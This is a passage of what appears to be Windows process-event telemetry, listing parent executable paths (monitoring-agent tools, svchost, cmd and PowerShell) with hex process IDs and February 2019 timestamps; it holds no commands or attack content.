00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10802019-02-10 08:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x12482019-02-10 08:15:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x10442019-02-10 08:45:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf082019-02-10 08:48:32.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xa782019-02-10 09:05:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-10 09:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x23d82019-02-10 09:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x3f82019-02-10 09:48:32.293000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x23b82019-02-10 09:55:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15482019-02-10 10:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10a82019-02-10 10:45:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x5a82019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xf882019-02-10 10:48:32.310000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x18b82019-02-10 11:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x16e82019-02-10 11:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1d042019-02-10 11:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0xda82019-02-10 11:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1f202019-02-10 12:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xe3c2019-02-10 12:25:36.257000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fa42019-02-10 12:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x220c2019-02-10 12:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x6502019-02-10 13:15:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15702019-02-10 13:15:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xf602019-02-10 13:45:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x154c2019-02-10 13:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xc602019-02-10 14:05:36.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6382019-02-10 14:15:36.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15fc2019-02-10 14:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe0x1d382019-02-10 14:48:32.337000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x17b02019-02-10 14:55:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x17d02019-02-10 15:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x1fd02019-02-10 15:45:36.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0xe242019-02-10 00:45:27.780000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x21202019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2701970-01-01 00:00:00.000000\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7981970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14ec2019-02-09 20:05:31.010000\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16842019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd742019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23682019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x6f82019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x205c2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x20802019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1be02019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x108c2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19282019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12f82019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13682019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11242019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23d82019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 